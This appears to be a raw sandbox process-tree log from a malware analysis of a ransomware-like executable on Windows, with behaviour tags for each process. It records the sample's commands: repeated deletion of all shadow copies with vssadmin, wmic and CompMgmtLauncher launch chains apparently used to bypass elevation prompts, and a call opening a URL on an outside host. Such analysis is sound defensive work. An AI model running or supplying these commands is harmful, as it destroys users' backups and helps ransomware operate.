C:\Windows\system32\cmd.execmd /c "start http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni^&1^&46782124^&88^&339^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni&1&46782124&88&339&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:956 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:956 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1896
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe"C:\Users\Admin\AppData\Local\Temp\463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1720
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1620
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1068
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:1212
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1316
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1596
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:1464
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1544
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:1760
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1612
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1080
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1692
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2044
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1908
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1516